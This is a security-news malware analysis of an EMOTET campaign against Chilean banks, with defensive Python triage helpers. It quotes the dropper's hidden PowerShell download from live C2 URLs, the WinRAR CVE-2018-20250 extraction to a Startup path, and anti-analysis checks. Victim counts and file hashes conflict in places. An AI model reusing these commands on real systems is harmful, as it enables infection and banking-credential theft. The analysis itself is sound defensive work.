[SI-LAB] EMOTET spread in Chile impacted hundreds of users and targeted financial and banking services

Pierluigi Paganini April 10, 2019

EMOTET spread in Chile targeted financial and banking services. SI-LAB detected hundreds of users that were impacted by this malware between March 18th and 26th of 2019.

The last days of March 2019 made headlines due to a targeted cyber attack involving a new variant of the infamous EMOTET malware. This threat is known as a banking trojan that collects financial information by injecting malicious code into the victim's computer.

EMOTET has evolved in its delivery; however, this wave was conducted in the most common form: malicious documents or URL links inserted into the body of an email, sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, a total of 176 users from Chile were affected in a broad cyber threat that occurred between March 18th and 26th of 2019. Once again, the main goal of this EMOTET campaign was to exfiltrate financial credentials from users' computers in order to access financial and banking services geolocated in Chile.

The first phase, identified as "__Denuncia_Activa_CL.PDF.bat", is responsible for a crucial part of this threat. That file was delivered via malspam campaigns around the world and its source code is obfuscated in order to evade antivirus detection and complicate analysis.

Interestingly, the first phase bypasses VirusTotal (VT) detections. With that, the criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living-off-the-land technique was used, making the file fully undetectable (FUD), which is the ultimate goal for malware authors.

The .bat file is a Windows batch script responsible for downloading a second script from the Command & Control (C&C) server. The latter leverages the WinRAR/ACE vulnerability (CVE-2018-20250) to drop the malware itself into the Windows Startup folder. Next, the infected machine is rebooted and the malware becomes persistent through the system startup.

The high-level workflow of this campaign is illustrated below.

[Figure: high-level workflow of the EMOTET campaign]

EMOTET was protected with the commercial packer Themida, which introduced an additional protection layer that made analysis harder. Other restrictions were also coded to prevent execution in certain scenarios: in this case, the malware authors introduced several anti-run checks related to the victims' geolocation and language preferences, so only computers configured for Spain/Chile were compromised.

The Themida packer has a large set of features that criminals appreciate for protecting their threats. For example, it uses VM-protection techniques, anti-debug protection, virtual machine emulation, anti-monitor techniques and anti-memory patching (see all Themida features here).

The first alert related to this wave was observed on March 22nd by the Computer Security Certified Response Team (CSIRT) of the Ministry of the Interior of Chile.

“Preliminary information collected allows us to determine that the following URLs and the following IP addresses must be blocked, unless otherwise indicated,” the CSIRT Ministry of the Interior states.

“Based on information obtained from internal sources, the cybersecurity alert situation was identified by an incident related to malicious software called EMOTET affected by the relevant sectors of the economy” – CSIRT Chile.

CSIRT released a comprehensive list of IP addresses related to EMOTET that had to be blocked. A national alert was issued (below) and can be consulted at this URL.

[Figure: CSIRT Chile national alert]

SI-LAB detected that this attack started some days before the alerts were published. The second malware phase (denuncias.rar), which used the WinRAR/ACE vulnerability (CVE-2018-20250) to drop the malware itself, was uploaded by the criminals to the opendir C2 server on March 18th, 2019. As noted below in the Technical Analysis, the malware was uploaded again later into another web folder on March 21st, possibly an update performed by its operators to improve functionality or to fix some bug.

[Figure: opendir C2 server listing]

As mentioned above, EMOTET only executes on victims' computers with Spain/Chile configured as the primary language, and this is an indicator that points to a targeted attack.

After several rounds of analysis of the malware, we found that some Chilean financial and banking organizations were targeted, including:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile

When the malware is executed without any restrictions, i.e., on a non-virtualized environment, some information from the victim's computer is sent to the C2 server. Data includes the date/hour of infection, the remote IP of the victim's computer, the OS version and the antivirus name.

[Figure: data sent by EMOTET to the C2 server]

This information was available online on the opendir C2 server, and SI-LAB analysed the data in order to understand the total number of infections and victims impacted by this targeted attack.

In detail, we found that 1089 users were impacted by this malware between March 18th and 26th, 2019.

We built a GeoMap of Threats that aggregates the victims' IP addresses, based on their geolocation, collected from all the data on the opendir C2 server. Colour intensity is correlated with the number of infections, with the darkest red corresponding to 175 infections in Chile.

[Figure] GeoMap of Threats: EMOTET victims of cyber threat in Chile

As indicated on the GeoMap of Threats, Chile, the USA, Germany and France were the countries with the most hits observed by SI-LAB. From a total of 1089 infections, 175 victims were in Chile, 162 in the USA, 137 in Germany and 132 in France.

The governmental agency CSIRT and the Cybersecurity National System of Chile are currently fighting this growing threat and have been working on increasing awareness among users in the country. They encourage users to stay tuned to their computer security alerts.

For more details and complete analysis of this malicious campaign see the Technical Analysis below.

Technical Analysis


Threat name: __Denuncia_Activa_CL.PDF.bat
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


The last weeks of March 2019 were underlined for the wrong reasons: a global cyber threat targeted financial institutions and banks in Chile via the EMOTET banking trojan.

This campaign was conducted via an initial malspam wave adding malicious documents or URL links inside the body of an email, sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, 1089 users were impacted by this wave, 176 in Chile alone. This malware is not new and, once again, the main goal was the exfiltration of users' credentials to access financial and banking services geolocated in Chile.

The first malware phase, identified as "__Denuncia_Activa_CL.PDF.bat", is the maestro of all the operations carefully planned by the criminals. This file was delivered via malspam campaigns around the world and its code is obfuscated in order to evade antivirus detection and make analysis harder. Figure 1 (below) shows the batch script encoded in little-endian UTF-16.


Figure 1: EMOTET malware obfuscated (encoded in Little-endian UTF-16) — the first phase.

After some rounds it was possible to recover the malware source code in ASCII, shown below.

Figure 2: EMOTET malware deobfuscated — the first phase.

In general, the malicious batch script performs the following actions:

1. Generates a random name to rename the 2nd stage (dropper)

First, the malware generates a random name for the 2nd file downloaded from the C2 server (the stage that exploits the WinRAR/ACE vulnerability, CVE-2018-20250). The latter drops EMOTET itself into the Windows Startup folder (discussed later).

In detail, on lines 33, 34 and 35 we can observe that the second stage is downloaded to the victim's Downloads folder. The next image presents the output generated by the batch file.


Figure 3: Malware source-code output – the first phase.

2. Drops the 2nd stage: a PowerShell command is executed to download the WinRAR exploit file 'denuncias.rar'.

  PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('%downloadurl%'

The 2nd stage is downloaded from the C2 server, renamed ("25RqcZpQ3.rar") and placed into the "C:\Users\root\Downloads" folder.


Figure 4: Download path – the first phase.

As shown, this file is downloaded from an opendir C2 server. Note that the C2 server hosts this file in two different directories, namely:

  1. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/02/denuncias.rar
  2. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/03/denuncias.rar (URL hardcoded in the 1st stage of the malware)


Figure 5: 2nd stage available to download in two different directories.

3. Extracts EMOTET via WinRAR: after the 2nd stage ('denuncias.rar') is downloaded, WinRAR is invoked on it and the malware itself ('Integrity.exe', EMOTET) is dropped by the WinRAR/ACE vulnerability into the Windows Startup folder; see lines 38 to 42 in Figure 2.

  "%ProgramFiles%\WinRAR\winRar.exe" x -y -c "%downloadpath%\%arch%" "%downloadpath%"

4. Pings for delay simulation

  ping 127.0.0.1 -n 1 > nul

5. Reboot for malware persistence

Once the command shutdown -r is executed, Windows reboots. This step completes the malware persistence, as EMOTET, extracted from the 2nd stage, has been placed in the Windows Startup folder. While a normal reboot by the user would have the same effect, for some reason this campaign does not wait for the user to initiate the reboot.

Upon reboot, the malicious program "Integrity.exe" (the EMOTET malware) gets into action and connects to the Command and Control (C&C) server.
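The five steps above form a recognisable chain: a UTF-16 encoded batch file, a hidden PowerShell download of an archive, a WinRAR extraction and a forced reboot. The triage helper below is an added example written for this article, not SI-LAB's tooling or the campaign's code. It decodes a batch script that may be stored as little-endian UTF-16 (as Figure 1 shows) and flags each of those behaviours. The sample script is constructed from the command fragments quoted in the analysis; the download URL in it is a placeholder, not the real C2.

```python
"""Added triage helper: decode a (possibly UTF-16) batch script and report the
stage-1 behaviours described in the analysis. Not the campaign's own code."""
import re
from typing import Dict, List, Tuple

# Constructed stand-in for the first stage, modelled on the fragments shown in
# the analysis. The URL is a placeholder, not the real C2 server.
SAMPLE_BAT = (
    "@echo off\r\n"
    "set downloadurl=http://c2.example.invalid/wp-content/uploads/denuncias.rar\r\n"
    "set downloadpath=%USERPROFILE%\\Downloads\r\n"
    "set arch=25RqcZpQ3.rar\r\n"
    "PowerShell -windowstyle hidden -Command \"(New-Object Net.WebClient)"
    ".DownloadFile('%downloadurl%','%downloadpath%\\%arch%')\"\r\n"
    "\"%ProgramFiles%\\WinRAR\\winRar.exe\" x -y -c \"%downloadpath%\\%arch%\" "
    "\"%downloadpath%\"\r\n"
    "ping 127.0.0.1 -n 1 > nul\r\n"
    "shutdown -r\r\n"
)
# Same script as it would sit on disk: UTF-16LE with a byte-order mark.
SAMPLE_BYTES = b"\xff\xfe" + SAMPLE_BAT.encode("utf-16-le")

# Each indicator is one step of the chain the analysis describes.
INDICATORS = {
    "hidden_powershell": re.compile(r"powershell[^\r\n]*-windowstyle\s+hidden", re.I),
    "webclient_download": re.compile(r"Net\.WebClient\)\.DownloadFile\(", re.I),
    "winrar_extract": re.compile(r"winrar\.exe\"?\s+x\s", re.I),
    "forced_reboot": re.compile(r"(^|\s)shutdown\s+-r\b", re.I | re.M),
    "ping_delay": re.compile(r"(^|\s)ping\s+127\.0\.0\.1\s+-n\s+\d+", re.I | re.M),
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
ARCHIVE_RE = re.compile(r"[\w.\-]+\.(?:rar|ace)\b", re.I)


def decode_script(raw: bytes) -> Tuple[str, str]:
    """Return (text, encoding) for a batch file stored as UTF-16 or ASCII."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le", errors="replace"), "utf-16-le (BOM)"
    if raw.startswith(b"\xfe\xff"):
        return raw[2:].decode("utf-16-be", errors="replace"), "utf-16-be (BOM)"
    odd = raw[1:16:2]
    # BOM-less UTF-16LE of ASCII text shows up as NUL bytes at every odd offset.
    if odd and odd.count(0) == len(odd):
        return raw.decode("utf-16-le", errors="replace"), "utf-16-le (no BOM)"
    return raw.decode("ascii", errors="replace"), "ascii"


def triage(raw: bytes) -> Dict[str, object]:
    """Decode the script and summarise which stage-1 behaviours it contains."""
    text, encoding = decode_script(raw)
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(text)]
    urls = URL_RE.findall(text)
    archives = sorted(set(ARCHIVE_RE.findall(text)))
    # Download + archive extraction + forced reboot is the full chain.
    chain = {"webclient_download", "winrar_extract", "forced_reboot"} <= set(hits)
    verdict = "stage1-chain" if chain else ("suspicious" if hits else "clean")
    return {"encoding": encoding, "indicators": hits, "urls": urls,
            "archives": archives, "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_BYTES).items():
        print(f"{key:>11}: {value}")
```

The decoder matters more than it looks: string-based scanners that read the file as ASCII see only NUL-separated characters and never match "DownloadFile" or "shutdown", which is one reason a UTF-16 batch file slips past naive detection.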

Figure 6: Infection graph generated and extracted from VirusTotal.

As noted above, the first phase bypasses VirusTotal (VT) detections, which is the ultimate goal for malware authors; Figure 7 shows the result.

Figure 7: No detections were identified by VT.

2nd stage — The dropper uses the WinRar/ACE vulnerability to distribute EMOTET


Threat name: 25RqcZpQ3.rar / denuncias.rar
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


Looking inside the dropper, we can observe interesting artifacts.


Figure 8: Hex code from ‘denuncias.rar’ file — EMOTET dropper.

As shown, the string "C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe" is found. In fact, this is CVE-2018-20250 just saying "hello world, I'm here!"

In detail, if UAC is running, when you attempt to extract the archive it will fail to place the malware in the "C:\ProgramData" folder due to lack of permissions. This causes WinRAR to display an error stating "Access is denied" and "operation failed".

On the other hand, if UAC is disabled or WinRAR is run with administrator privileges, it will install the malware to the following path:

  C:\Users\root\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe
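The telltale sign in Figure 8 is a member name that starts with a drive letter but no separator ("C:.." rather than "C:\"), climbs with ".." and lands in a Startup folder. The scanner below is an added example for this article, not part of the original analysis or of any WinRAR tooling: it pulls printable path-like strings out of raw archive bytes and classifies each one by the traits that made CVE-2018-20250 exploitable. The archive bytes it runs on are a constructed blob that carries only the quoted filename; real ACE header structures are not reproduced.

```python
"""Added archive-triage helper: flag archive member names that would escape
the extraction directory. Not the analysis' own tooling."""
import re
from typing import Dict, List

# Constructed stand-in for a malicious ACE archive. Only the embedded member
# name matters to this check; the surrounding bytes are filler.
CONSTRUCTED_ARCHIVE = (
    b"\x00" * 7 + b"**ACE**" + b"\x00" * 12
    + b"C:../AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Integrity.exe"
    + b"\x00" * 8 + b"MZ\x90\x00"
)

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{8,}")
# Matches "Start Menu" and the "Start.Menu" rendering seen in the hex dump.
STARTUP_RE = re.compile(r"start[ .]menu[\\/]programs[\\/]startup", re.I)


def classify_member(name: str) -> Dict[str, bool]:
    """Describe why an archive member name is dangerous, trait by trait."""
    rel = re.sub(r"^[A-Za-z]:", "", name)          # drop a leading drive letter
    segments = rel.replace("\\", "/").split("/")
    return {
        # ".." as a whole path component climbs out of the extraction folder.
        "traversal": ".." in segments,
        # "C:.." style: drive letter with no separator, the trick the CVE abused.
        "drive_relative": re.match(r"^[A-Za-z]:(?![\\/])", name) is not None,
        # Fully qualified paths should never appear in a member name either.
        "absolute": re.match(r"^[A-Za-z]:[\\/]", name) is not None,
        # Landing in a Startup folder means the payload runs at next logon.
        "startup_target": STARTUP_RE.search(name) is not None,
    }


def scan_archive(blob: bytes) -> List[Dict[str, object]]:
    """Return every path-like string in the blob that shows a dangerous trait."""
    findings: List[Dict[str, object]] = []
    for match in PRINTABLE_RUN.finditer(blob):
        name = match.group().decode("ascii")
        if "\\" not in name and "/" not in name:
            continue                                  # not a path at all
        traits = classify_member(name)
        if any(traits.values()):
            findings.append({"name": name, "offset": match.start(), **traits})
    return findings


if __name__ == "__main__":
    for finding in scan_archive(CONSTRUCTED_ARCHIVE):
        print(finding)
```

Because the check works on raw bytes, it applies to a RAR-named file that is really ACE (the dropper here was renamed to "25RqcZpQ3.rar") without needing a parser for either format; a proper mitigation remains updating WinRAR past the vulnerable ACE module or stripping ACE support entirely.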

Extracting all the files, we can retrieve and analyse the malware itself.

Figure 9: EMOTET malware ('Integrity.exe') dropped by the 2nd stage.

More details on CVE-2018-20250 here.

EMOTET / Integrity.exe


Threat name: Integrity.exe
MD5: 98172becba685afdd109ac909e3a1085
SHA1: cbb0377ec81d8b120382950953d9069424fb100e
First submission: 2019-03-18 15:10:08


Digging into the last malware infection stage, we face the EMOTET banking trojan, a credential-stealing malware that has been infecting users in Chile in recent months.

At first glance, the malware is protected with the Themida 2.x packer. This is bad news for malware analysts.

Unpacking Themida, especially the newer versions, is not a small task by any means. Themida uses an extremely complex virtual machine environment combined with every anti-debug and anti-analysis trick in the book, plus many different obfuscation methods.

In a Themida binary, different parts of the code run in virtual machines, which obscures the behaviour of the target program. The best method to unpack a VM-protected packer like Themida is to devirtualize it, which involves figuring out the entire instruction set that the packer uses and writing a script to interpret that language.

Figure 10 shows the binary was developed in Delphi; nonetheless, we will not decompile it because Themida is very hard to unpack and that task is extremely complex.

Figure 10: Packer and compiler detected: Themida 2.x and Delphi.

As we can see below (Figures 11 and 12), reinforcing the presence of the packer, some sections have null names and others have high entropy (around 8.0). This is a clear signal that we are facing a challenge: the Themida packer!


Figure 10: EMOTET section entropy.

Figure 11 below illustrates, in its middle section, that a great part of this file is really packed.


Figure 11: Emotet file entropy.

Another perfect indicator that Themida is present is the PE file import table (IAT). The IAT is partially destroyed and only one function from kernel32.dll can be observed: lstrcpy.

Figure 12: EMOTET IAT (result from Themida packer).

Dig into the details

The Themida packer is, in fact, a constant challenge for malware analysts. The approach we used to inspect the malware file was to dump it from memory while it is running. Nevertheless, remember that only small pieces of code are devirtualized by Themida during execution. Keep in mind as well that Themida detects monitoring tools such as file and registry monitors.

First, the virtual machine needs to be tuned to simulate the infection scenario as realistically as possible. For this, we need to change the system language preferences to Spain/Chile and adjust some values in the Windows Registry from which the malware reads to detect analysis environments.

Figure 13: Changes performed to the SystemBiosDate and VideoBiosVersion values under HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System.

But nothing is perfect. The malware constantly checks the processes running in the system and terminates if any of the following are found (this is an evasion technique used by the Themida packer, available here). This is one of the many features of this modern packer.

  indicators = [
      "OLLYDBG",
      "GBDYLLO",
      "pediy06",
      "FilemonClass",
      "File Monitor - Sysinternals: www.sysinternals.com",
      "PROCMON_WINDOW_CLASS",
      "Process Monitor - Sysinternals: www.sysinternals.com",
      "RegmonClass",
      "Registry Monitor - Sysinternals: www.sysinternals.com",
      "18467-41",
  ]

Well, back to EMOTET: after dumping it from memory, we observed some things such as the imported DLLs and the malware strings.

Only a few blocks of EMOTET can be analysed, as Themida runs on a virtual machine environment. Thus, malware functions are devirtualized in real time, and we cannot fix the IAT properly either.


Figure 14: DLLs imported by EMOTET and anti-VM and anti-dbg techniques detected in this specific memory dump.

After dumping it from memory, we observe that only some DLLs are rebuilt. We suspect the others remain hidden. Both anti-VM and anti-debug techniques were again detected after dumping the malware. This is nothing new!

However, some information can be extracted from the binary. When it is executed on victims' computers, initial information is sent to the C2 server (a kind of "EHLO" message with some arguments).

Figure 15: EMOTET C2 server URL.

Information sent includes:

  • Date/hour of infection
  • Victim IP Address
  • Windows OS version
  • Antivirus name

Figure 16 presents a query performed by the malware in order to identify the antivirus name running on the infected machine. Winmgmts is the WMI service within the SVCHOST process running under the "LocalSystem" account.


Figure 16: EMOTET collects antivirus product name via WMI query.

The file "up.php" writes all the entries to another file called "tictic.txt". Every time a victim is infected, an EHLO request is sent to "up.php", which writes the infection data highlighted above into this file.

Figure 17: EMOTET C2 files available in an opendir.

Through this file, available on the opendir C2, it was possible to build the GeoMap of Threats presented at the beginning of the article.

After processing the data we found that 1089 users were infected during this campaign. As pointed out, Chile, the USA, Germany and France were the countries with the most hits. From a total of 1089, 175 victims were in Chile, 162 in the USA, 137 in Germany and 132 in France.

But it is important to answer this question: what kind of data is collected by this banking trojan? Banking credentials, of course.
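The GeoMap described above is, in data terms, a pipeline: parse the beacon records that up.php appended to tictic.txt, geolocate each victim IP, and count per country within the campaign window. The script below is an added example written for this article, not SI-LAB's code. The record layout (date|ip|os|antivirus), the sample lines and the prefix-to-country table standing in for a GeoIP database are all constructed, since the analysis does not document the real file format; the IPs come from documentation ranges.

```python
"""Added example: aggregate beacon records of the kind written to tictic.txt
into a per-country victim count. Not SI-LAB's tooling."""
from collections import Counter
from datetime import datetime
from ipaddress import ip_address, ip_network
from typing import Dict, List, Tuple

# Constructed record layout: date|ip|os|antivirus. The real format is not
# documented in the analysis; the IPs are from documentation ranges.
SAMPLE_TICTIC = """\
2019-03-18 15:12:03|192.0.2.10|Windows 7 Professional|Windows Defender
2019-03-18 16:40:51|192.0.2.11|Windows 10 Pro|Avast Antivirus
2019-03-19 09:02:17|198.51.100.7|Windows 8.1|ESET NOD32 Antivirus
2019-03-19 09:02:17|198.51.100.7|Windows 8.1|ESET NOD32 Antivirus
2019-03-20 11:15:00|203.0.113.5|Windows 10 Home|Kaspersky
this line is garbage and must be skipped
2019-03-26 23:59:59|192.0.2.12|Windows 7 Ultimate|Windows Defender
"""

# Constructed stand-in for a GeoIP database: network prefix -> country code.
GEO_TABLE = [
    (ip_network("192.0.2.0/24"), "CL"),
    (ip_network("198.51.100.0/24"), "US"),
    (ip_network("203.0.113.0/24"), "DE"),
]

Record = Tuple[datetime, str, str, str]


def geolocate(ip: str) -> str:
    """Map an address to a country code, '??' when no prefix matches."""
    addr = ip_address(ip)
    for net, country in GEO_TABLE:
        if addr in net:
            return country
    return "??"


def parse_records(text: str) -> List[Record]:
    """Parse well-formed records and silently drop malformed lines."""
    records: List[Record] = []
    for line in text.splitlines():
        parts = line.strip().split("|")
        if len(parts) != 4:
            continue
        try:
            when = datetime.strptime(parts[0], "%Y-%m-%d %H:%M:%S")
            ip_address(parts[1])          # validates the address field
        except ValueError:
            continue
        records.append((when, parts[1], parts[2], parts[3]))
    return records


def build_geomap(text: str, start: str = "2019-03-18",
                 end: str = "2019-03-26") -> Dict[str, object]:
    """Count victims per country inside the campaign window (inclusive dates)."""
    lo = datetime.strptime(start, "%Y-%m-%d").date()
    hi = datetime.strptime(end, "%Y-%m-%d").date()
    recs = [r for r in parse_records(text) if lo <= r[0].date() <= hi]
    # A victim that beacons twice is still one victim: count unique IPs.
    unique_ips = {ip: geolocate(ip) for _, ip, _, _ in recs}
    by_country = Counter(unique_ips.values())
    antivirus = Counter(av for _, _, _, av in recs)
    return {
        "entries": len(recs),
        "victims": len(unique_ips),
        "by_country": dict(by_country.most_common()),
        "antivirus": dict(antivirus.most_common()),
        "darkest": by_country.most_common(1)[0] if by_country else None,
    }


if __name__ == "__main__":
    for key, value in build_geomap(SAMPLE_TICTIC).items():
        print(f"{key:>10}: {value}")
```

Counting unique IPs rather than raw lines is a design choice worth stating in any report of this kind: a beacon written at every reboot would otherwise inflate the victim count, while NAT can hide several machines behind one address.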

EMOTET drops a sqlite3.dll DLL during its execution in order to read data from the SQLite databases of the popular installed web browsers.

Figure 18: EMOTET collects data from the main popular web browsers.

During static analysis it was also possible to observe the targeted banks and financial institutions involved in this attack, namely:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile

Figure 19: Banks and financial institutions involved in this attack.

Figure 20 (below) shows one of the latest administration panels used by EMOTET in its recent infections.


Figure 20: Administration panel used in recent variants by EMOTET.

Another interesting aspect is the following string, observed in past EMOTET infections and hardcoded inside many malware samples.

  C:\Projects\Pe indetectavel D2007\comps\TMSv7\AdvEdDD.pas

This is a drag-and-drop interface support file for Delphi 5, 6, 7, 2005, 2006 and C++Builder. We could not retrieve any more information about this library in the malware.

During this analysis we detected that the malware performs several connections to "www.bing.com", possibly to validate that an Internet connection is available.

Figure 21: Internet connection is validated during EMOTET execution.

Curiously, after several memory dumps we noticed that some interesting strings change in memory. At a specific moment we got the following:

  75EE6DE16BB9D5BE439A3EF523A83AFA
  BICE
  C852CE43C4D6371C2DA82AD878D20420
  64FF1C0E1F0D0962E878D57DAAF36980E903B51530D0
  B2ADBB5BD210030E1B6C82E6524BA740EE6D9E
  2E29C77CA62FA75D8ADC7FB690C8D87B9732E37C97B84983D8CF5F9449ED
  BBVA
  50C560964C889B83EF71E713C11243F21DBE6FBE4A85A922
  212DC56494CF022FDC79D7B3B214B971D8123297FD003291CF
  D97482A059F06188A526A28681C20823
  C650E40229AAF90830A3AD
  ITA
  CC57EF022BAC2F04297BF728CFF324C360E71EBC6183A5
  8C94A257F056F65CF1205A8AAD918191B71DCA013EDE01
  64F00236E66EFC240866E60A359A
  A1A85B9C5CF95BF72775C2A6AE29A75C8297AF20C4788ACC075B83
  SANTA
  5DF40FD0084580AA52405E3A3AA221D30A1F37A95287BB1EB42DD1BC43F3053D94
  59F50E2BDC72D5BEA7F50B28D00D4C3BC71CCF759C4AFD57FF171431D91EDB
  64FF34F315499D
  B8509C5B8C9E2B00094487BD65E173B198F054A743F007425490BF6394AD44E47CA48587AE4DEE03
  AAB671B06FE66981B8EA2B0F17419F548A9FB728DC1022A43F9348252BCB6D95CC
  ACB74CEB034053DD01418280A72FA253
  CORP
  D945F333DA788E49F161F622046DE2023C9E489846
  ESTADO
  5FF80F2CC30175A35487D80C6A83D81CC60334A45233FC294485A049F139
  8E89BF7FAE2C42FE3F92C571D71146EF2AAC5E8E4829F6235383BF6E8CF4023C6AFCAB55FB08
  BCA75C9BB21066924B9E30DBBD32AB5883C768E41FD065EC78DC
  3FD86F8CA3215583BB2FA05432BB11D5025201538CED60F95CF911C96883
  61FA0926C5077FB962F16590F61D0D053B9E5488B15296
  948FA545E466B551FA295F83AA2EA3
  CHILE
  2A23DD01389537D30B19A68282DA798BB3E60E42282AC11FBD14
  50F926C264D2C1599E3E90F464BD30C67CEA1F0E38DCAFC619B56C9C
  8C85A145F565E248C11DBE759C29BA79
  BE87512029A426D375DA0FC6A02474E10A4DF5543EE31A0E67F82CD578
  2F28DC1A31928188A723
  BCI
  9883B34C36AB2B0061B3CB7DAB27BC6781C1
  64FF36CEA2C015CC0C4984A1534AF640CB18C316CFAEA333AA
  FB679F58344B8BB06FE6698E4789C86BC20A6F80AB5BED69BF35D60D
  B1AA5996B517041CCD034BF925A02A
  SECU
  44DF14D37BD8CB59F65181A74B8ECA7BEE3AD90A32D465B121B8964E7FB543E83FEE4EF826D91EC7789AB12B5E83EE13B563F831CC
  FALA
  F36F85A24A8B9895BA1545E30F429E57
  F41C28DE021050FE2AAD13C6A0CE0431C81FDD
  WebPay
  2727D96DF161E9
  E9649C5E983093BF6BAB3CEF1B0277B49D3EE66085B685C1074E8CA04E36C264B2698BBD6C8AFD34EF53F36D9A4FFD5383A9FD1725D7134124
  ServiPag
  F8152FF02BA624CE7A9ACE7AA1
  2932CE659F24BA6287D97AA98F3565F01BBC65E54CDE11B41FBF6F9CBE75B8
  SCOTI
  A8B67C8CB629BD7AD62EA85D89D77B8BB7

These seem to be encrypted strings with specific information about banking systems (maybe endpoints; we don't know).

One way to understand the malware completely is to devirtualize the entire code. As shown, the Themida packer makes malware analysis harder and that was a big challenge during this investigation.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Pedro Tavares.

About the author: Pedro Tavares

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the computer security blog segurancainformatica.pt.


Pierluigi Paganini

(SecurityAffairs – EMOTET malware, hacking)
